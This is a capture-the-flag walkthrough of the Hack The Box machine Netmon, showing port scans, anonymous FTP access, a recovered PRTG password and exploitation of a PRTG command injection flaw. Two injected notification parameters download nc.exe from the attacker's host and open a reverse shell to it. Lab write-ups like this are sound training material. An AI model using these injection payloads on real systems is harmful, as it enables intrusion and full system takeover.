Netmon: Hack The Box Walkthrough
source link: https://www.tuicool.com/articles/RBRvYfb
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Netmon, a retired vulnerable VM created by mrb3n , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
Background
Netmon is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.152 --rate=700 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-10 13:41:15 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 49666/tcp on 10.10.10.152 Discovered open port 49664/tcp on 10.10.10.152 Discovered open port 49677/tcp on 10.10.10.152 Discovered open port 49667/tcp on 10.10.10.152 Discovered open port 49665/tcp on 10.10.10.152 Discovered open port 52337/tcp on 10.10.10.152 Discovered open port 5985/tcp on 10.10.10.152 Discovered open port 139/tcp on 10.10.10.152 Discovered open port 47001/tcp on 10.10.10.152 Discovered open port 80/tcp on 10.10.10.152 Discovered open port 445/tcp on 10.10.10.152 Discovered open port 49668/tcp on 10.10.10.152 Discovered open port 21/tcp on 10.10.10.152 Discovered open port 135/tcp on 10.10.10.152 Discovered open port 53099/tcp on 10.10.10.152
Whoa. masscan
finds many open ports. Let’s do one better with nmap
scanning the discovered ports to see what services are available.
# nmap -n -v -Pn -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677,52337,53099 -A --reason 10.10.10.152 -oN nmap.txt ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_02-25-19 11:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: PRTG/18.1.37.13946 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm |_http-trane-info: Problem with XML parsing of /evox/about 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 52337/tcp closed unknown reset ttl 127 53099/tcp closed unknown reset ttl 127 ... Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-10 13:48:31 |_ start_date: 2019-03-10 13:32:38
Since anonymous FTP login is allowed, let’s go with that first.
File Transfer Protocol
To my pleasant surprise, C:\Users\Public
is available.
And guess what, user.txt
is here!
PRTG Network Monitor
Moving on to the http
service, this is how it looks like.
In conjunction with the official security advisory and the location of the various configuration files, I was able to uncover a plaintext password from the file below.
Here’s the plaintext password.
And since this is a backup and knowing administrators increment the year for convenience’s sake, the password may be [email protected]
. Let’s give it a shot.
Awesome.
PRTG < 18.2.39 Command Injection Vulnerability
During my research for vulnerability related to PRTG, I chanced upon this blog discussing command injection vulnerability, with SYSTEM
privileges no less.
Follow the instructions to create a custom notification with the following parameters.
test.txt; Invoke-WebRequest http://10.10.15.200/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe
If you’ve read the blog carefully, you’ll realize certain characters are encoded. As such, I’m avoiding certain bad characters, if you will, to download a copy of nc.exe
to c:\Users\Public\Downloads
with PowerShell.
Verify that nc.exe
is indeed downloaded.
Next, we use the following parameters to run a reverse shell back to us.
test.txt; c:\Users\Public\Downloads\nc.exe 10.10.15.200 1234 -e cmd.exe
Getting root.txt
is trivial when you have SYSTEM
privileges.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK